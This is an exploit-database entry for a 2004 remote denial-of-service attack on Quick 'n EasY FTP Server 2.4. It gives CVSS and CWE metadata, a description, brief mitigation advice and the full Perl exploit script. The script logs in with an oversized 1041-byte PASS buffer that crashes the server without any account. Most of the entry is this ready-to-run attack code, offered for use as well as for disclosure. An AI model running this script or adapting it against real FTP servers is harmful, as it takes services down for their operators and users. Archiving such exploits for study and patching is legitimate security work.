Quick 'n EasY VER 2.4 Ftp Server remote D.o.S

vendor:

Quick 'n EasY Ftp Server

by:

KaGra

7.5

CVSS

HIGH

Denial of Service (D.o.S)

400

CWE

Product Name: Quick 'n EasY Ftp Server

Affected Version From: 2.4

Affected Version To: 2.4

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP1 (English version)

2004

Quick ‘n EasY VER 2.4 Ftp Server remote D.o.S

This exploit allows an attacker to remotely crash the Quick 'n EasY VER 2.4 Ftp Server by sending a large buffer in the PASS command. This can be done without any user account. The vulnerability can be triggered when the server's log file is viewed. The exploit can also be used with other commands like APPE and CWD, but for those, at least a guest account is required. The exploit has been tested on Windows XP SP1 English version.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a newer version of the Quick 'n EasY Ftp Server that addresses this issue. Additionally, limiting access to the log files and implementing proper log file viewing controls can help reduce the impact of this vulnerability.

Source

Exploit-DB raw data:

#!/usr/local/bin/perl -w

###########################################################
###########################################################
##   Quick 'n EasY VER 2.4 Ftp Server remote D.o.S
##         Discovered,exploited by KaGra
##	Tested on WinXP SP1 English version
## sENDING a big buffer in PASS,at least 1041 bytes	
## will crash the sever,as long as the logfile on server
## is viewed or just at the time it will be viewed.This
## sploit works also for almost ALL commands (like APPE
## ,CWD etc),but as u understand,for them U should have at
## least a guest account.For this sploit,no account needed.
## PS:Many thankz to muts for the shellcode at Ability Server APPE sploit...
############################################################
############################################################


use Net::FTP;


$hostname = 'localhost'; 		#Remote Host to D.o.S!
$username = 'anonymous'; 		#AnythinG HeRe!

print "\n[*]BuiLDinG BuFfer...\n";

$password = 'A'x1041   ; 		#OverFlow BuffEr!
print "[*]ConnectinG To TarGet...\n";

$ftp = Net::FTP->new($hostname);        # Connecting...
print "[*]SenDing DeViL...\n\n";

$ftp->login($username, $password);      # Send EviL BuffeR...

$ftp->quit;
print "SerVer Has Been Dosed,will be Down if  LogFile is or will be viewed!\n";


# milw0rm.com [2004-10-24]